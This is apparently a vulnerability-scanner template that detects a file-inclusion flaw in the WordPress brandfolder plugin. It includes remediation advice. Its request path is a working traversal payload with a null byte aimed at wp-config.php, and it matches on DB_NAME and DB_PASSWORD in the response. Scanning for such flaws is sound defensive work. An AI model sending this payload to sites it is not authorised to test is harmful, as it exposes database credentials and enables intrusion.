id: brandfolder-lfi
info:
  name: Wordpress brandfolder plugin - RFI & LFI
  author:
  - l0ne1y
  tags:
  - wordpress
  - wp-plugin
  - lfi
  - rfi
  description: |-
    Wordpress Plugin brandfolder has an arbitrary file reading vulnerability
    A vulnerability in this plug-in could allow a remote attacker to access arbitrary files residing on local and remote servers and exfiltrate their contents.
  reference:
  - https://www.exploit-db.com/exploits/39591
  - https://cxsecurity.com/issue/wlb-2016030120
  severity: high
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: https://wordpress.com/zh-cn/install-plugins/

    Temporary fix:
    1. Filter \".\" so that users cannot go back to the upper directory in the URL.
    2. Regular matching strictly determines the format of user input parameters, hard-codes or uniformly encodes the file name parameters passed by the user, performs whitelist control on file types, and rejects parameters containing malicious characters or null characters.
    3. Prohibit the system from providing directory traversal services, such as: php.ini configures open_basedir to limit file access scope.
    4. Save the file path to the database and let the user submit the file corresponding to the ID to download the file.
    5. Verify permissions before users download files.
requests:
- matchers:
  - type: word
    condition: and
    part: body
    words:
    - DB_NAME
    - DB_PASSWORD
  - type: status
    status:
    - 200
  matchers-condition: and
  path:
  - '{{BaseURL}}/wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00'
  method: GET
